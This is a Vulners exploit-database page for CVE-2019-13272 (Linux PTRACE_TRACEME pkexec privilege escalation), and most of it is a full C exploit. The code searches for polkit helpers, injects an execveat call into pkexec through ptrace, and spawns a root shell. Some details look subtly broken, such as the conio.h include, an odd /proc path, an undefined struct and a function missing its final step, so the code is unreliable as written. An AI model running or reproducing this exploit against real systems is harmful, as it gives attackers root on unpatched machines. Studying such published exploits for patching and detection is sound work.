Vulners
Lucene search
Linux Kernel 5.1.x PTRACE_TRACEME pkexec Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 213 |
|---|---|---|---|---|
 | Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME Exploit | 17 Jul 201900:00 | – | zdt |
| Linux Kernel 4.10 < 5.1.17 - PTRACE_TRACEME pkexec Local Privilege Escalation Exploit | 26 Jul 201900:00 | – | zdt |
| Linux Polkit pkexec Helper PTRACE_TRACEME Local Root Exploit | 23 Oct 201900:00 | – | zdt |
| Linux PTRACE_TRACEME Local Root Exploit | 26 Mar 202000:00 | – | zdt |
| Linux Kernel 5.1.x - (PTRACE_TRACEME) pkexec Local Privilege Escalation Exploit (2) | 23 Nov 202100:00 | – | zdt |
 | Exploit for CVE-2019-13272 | 31 Jul 201906:36 | – | githubexploit |
| Exploit for CVE-2019-13272 | 31 Jul 201904:51 | – | githubexploit |
| Exploit for CVE-2019-13272 | 7 Aug 201901:21 | – | githubexploit |
| Exploit for Race Condition in Canonical Ubuntu_Linux | 4 Feb 202601:58 | – | githubexploit |
 | Security Bulletin: Vyatta 5600 vRouter Software Patches - Release 1801-zb | 11 Sep 201917:35 | – | ibm |
10
`# Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)
# Date: 11/22/21
# Exploit Author: Ujas Dhami
# Version: 4.19 - 5.2.1
# Platform: Linux
# Tested on:
# ~ Ubuntu 19.04 kernel 5.0.0-15-generic
# ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
# ~ Kali Linux kernel 4.19.0-kali5-amd64
# CVE: CVE-2019-13272
// ....
// Original discovery and exploit author: Jann Horn
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
// Modified exploit code of: BColes
// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
// ....
// ~ Uses the PolKit_Exec frontend.
// ~ PolKit_Action is branched.
// ~ Search is optimized.
// ~ Trunks attain search priority upon execution.
// ....
// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme
// ujas@kali:~$ ./exploit_traceme
// Welcome to your Arsenal!
// accessing variables...
// execution has reached EOP.
// familiar trunks are been searched ...
// trunk helper found: /usr/sbin/mate-power-backlight-helper
// helper initiated: /usr/sbin/mate-power-backlight-helper
// SUID process is being initiated (/usr/bin/pkexec) ...
// midpid is being traced...
// midpid attached.
// root@kali:/home/ujas#
// ....
#include <ctype.h>
#include <assert.h>
#include <conio.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <stddef.h>
#include <sys/user.h>
#include <linux/elf.h>
#include <stdarg.h>
#include <pwd.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#define _GNU_SOURCE
#define DEBUG
#ifdef DEBUG
#define dprintf printf
#endif
#define max(a,b) ((a)>(b) ? (a) : (b))
#define eff(expr) ({ \
typeof(expr) __res = (expr); \
if (__res == -1) { \
dprintf("[-] Error: %s\n", #expr); \
return 0; \
} \
__res; \
})
struct stat st;
const char *trunk[1024];
const char *trunks_rec[] = {
"/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
"/usr/sbin/mate-power-backlight-helper",
"/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
"/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
"/usr/lib/unity-settings-daemon/usd-backlight-helper",
"/usr/bin/xfpm-power-backlight-helper",
"/usr/bin/lxqt-backlight_backend",
"/usr/lib/gsd-backlight-helper",
"/usr/lib/gsd-wacom-led-helper",
"/usr/lib/gsd-wacom-oled-helper",
"/usr/libexec/gsd-wacom-led-helper",
"/usr/libexec/gsd-wacom-oled-helper",
"/usr/libexec/gsd-backlight-helper",
};
static int trace_align[2];
static const char *path_exec = "/usr/bin/pkexec";
static const char *path_action = "/usr/bin/pkaction";
static int fd = -1;
static int pipe_stat;
static const char *term_sh = "/bin/bash";
static int mid_succ = 1;
static const char *path_doublealign;
static char *tdisp(char *fmt, ...) {
static char overlayfs[10000];
va_list ap;
va_start(ap, fmt);
vsprintf(overlayfs, fmt, ap);
va_end(ap);
return overlayfs;
}
static int middle_main(void *overlayfs) {
prctl(PR_SET_PDEATHSIG, SIGKILL);
pid_t middle = getpid();
fd = eff(open("/proc/_fd/exe", O_RDONLY));
pid_t child = eff(fork());
if (child == 0) {
prctl(PR_SET_PDEATHSIG, SIGKILL);
eff(dup2(fd, 42));
int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));
char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());
eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
execl(path_exec, basename(path_exec), NULL);
while (1) {
char overlayfs[1000];
ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));
overlayfs[buflen] = '\0';
if (strstr(overlayfs, threadv)) break;
}
dprintf("SUID execution failed.");
exit(EXIT_FAILURE);
}
eff(dup2(fd, 0));
eff(dup2(trace_align[1], 1));
struct passwd *pw = getpwuid(getuid());
if (pw == NULL) {
dprintf("err: username invalid/failed to fetch username");
exit(EXIT_FAILURE);
}
mid_succ = 1;
execl(path_exec, basename(path_exec), "--user", pw->pw_name,
path_doublealign,
"--help", NULL);
mid_succ = 0;
dprintf("err: pkexec execution failed.");
exit(EXIT_FAILURE);
}
static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) {
struct user_regs_struct regs;
struct exeio exev = { .iov_base = ®s, .iov_len = sizeof(regs) };
eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
eff(waitpid(pid, &pipe_stat, 0));
eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));
unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;
struct injected_page {
unsigned long inj_arse[2];
unsigned long environment[1];
char arg0[8];
char path[1];
} ipage = {
.inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }
};
strcpy(ipage.arg0, arg0);
for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
unsigned long pro_d = ((unsigned long *)&ipage)[i];
eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long),
(void*)pro_d));
}
eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));
eff(ptrace(PTRACE_DETACH, pid, 0, NULL));
eff(waitpid(pid, &pipe_stat, 0));
regs.orig_rax = __NR_execveat;
regs.rdi = exec_fd;
regs.rsi = inject_surface + offsetof(struct injected_page, path);
regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);
regs.r10 = inject_surface + offsetof(struct injected_page, environment);
regs.r8 = AT_EMPTY_PATH;
}
static int stag_2(void) {
pid_t child = eff(waitpid(-1, &pipe_stat, 0));
timeexecbuffer(child, 42, "stage3");
return 0;
}
static int sh_spawn(void) {
eff(setresgid(0, 0, 0));
eff(setresuid(0, 0, 0));
execlp(term_sh, basename(term_sh), NULL);
dprintf("err: Shell spawn unsuccessful.", term_sh);
exit(EXIT_FAILURE);
}
static int check_env(void) {
const char* xdg_session = getenv("XDG_SESSION_ID");
dprintf("accessing variables...\n");
if (stat(path_action, &st) != 0) {
dprintf("err: pkaction not found at %s.", path_action);
exit(EXIT_FAILURE);
}
if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
dprintf("warn: PolKit agent not found.\n");
return 1;
}
if (stat("/usr/sbin/getsebool", &st) == 0) {
if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {
dprintf("warn: [deny_ptrace] is enabled.\n");
return 1;
}
}
if (xdg_session == NULL) {
dprintf("warn: $XDG_SESSION_ID is not set.\n");
return 1;
}
if (stat(path_exec, &st) != 0) {
dprintf("err: pkexec not found at %s.", path_exec);
exit(EXIT_FAILURE);
}
dprintf("execution has reached EOP.\n");
return 0;
}
int trunkh() {
char cmd[1024];
snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);
FILE *fp;
fp = popen(cmd, "r");
if (fp == NULL) {
dprintf("err: Failed to run %s.\n", cmd);
exit(EXIT_FAILURE);
}
char line[1024];
char buffer[2048];
int helper_index = 0;
int useful_action = 0;
static const char *threadv = "org.freedesktop.policykit.exec.path -> ";
int needle_length = strlen(threadv);
while (fgets(line, sizeof(line)-1, fp) != NULL) {
if (strstr(line, "implicit active:")) {
if (strstr(line, "yes")) {
useful_action = 1;
}
continue;
}
if (useful_action == 0)
continue;
useful_action = 0;
int length = strlen(line);
char* found = memmem(&line[0], length, threadv, needle_length);
if (found == NULL)
continue;
memset(buffer, 0, sizeof(buffer));
for (int i = 0; found[needle_length + i] != '\n'; i++) {
if (i >= sizeof(buffer)-1)
continue;
buffer[i] = found[needle_length + i];
}
if (stat(&buffer[0], &st) != 0)
continue;
if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
strstr(&buffer[0], "/cpugovctl") != 0 ||
strstr(&buffer[0], "/package-system-locked") != 0 ||
strstr(&buffer[0], "/cddistupgrader") != 0) {
dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);
continue;
}
trunk[helper_index] = strndup(&buffer[0], strlen(buffer));
helper_index++;
if (helper_index >= sizeof(trunk)/sizeof(trunk[0]))
break;
}
pclose(fp);
return 0;
}
int root_ptraceme() {
dprintf("helper initiated: %s\n", path_doublealign);
eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));
eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));
char overlayfs = 0;
eff(write(trace_align[1], &overlayfs, 1));
dprintf("SUID process is being initiated(%s) ...\n", path_exec);
static char stackv[1024*1024];
pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv),
CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
if (!mid_succ) return 1;
while (1) {
int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY);
char overlayfs[16];
int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1));
overlayfs[buflen] = '\0';
*strchrnul(overlayfs, '\n') = '\0';
if (strncmp(overlayfs, basename(path_doublealign), 15) == 0)
break;
usleep(100000);
}
dprintf("midpid is being traced...\n");
eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
eff(waitpid(midpid, &pipe_stat, 0));
dprintf("midpid attached.\n");
timeexecbuffer(midpid, 0, "stage2");
exit(EXIT_SUCCESS);
}
int main(int argc, char **inj_arse) {
if (strcmp(inj_arse[0], "stage2") == 0)
return stag_2();
if (strcmp(inj_arse[0], "stage3") == 0)
return sh_spawn();
dprintf("Welcome to your Arsenal!\n");
check_env();
if (argc > 1 && strcmp(inj_arse[1], "check") == 0) {
exit(0);
}
dprintf("efficient trunk is being searched...\n");
trunkh();
for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) {
if (trunk[i] == NULL)
break;
if (stat(trunk[i], &st) == 0) {
path_doublealign = trunk[i];
root_ptraceme();
}
}
dprintf("familiar trunks are been searched ...\n");
for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) {
if (stat(trunks_rec[i], &st) == 0) {
path_doublealign = trunks_rec[i];
dprintf("trunk helper found: %s\n", path_doublealign);
root_ptraceme();
}
}
return 0;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Nov 2021 00:00Current
8High risk
Vulners AI Score8
CVSS 27.2
CVSS 3.17.8
EPSS0.80379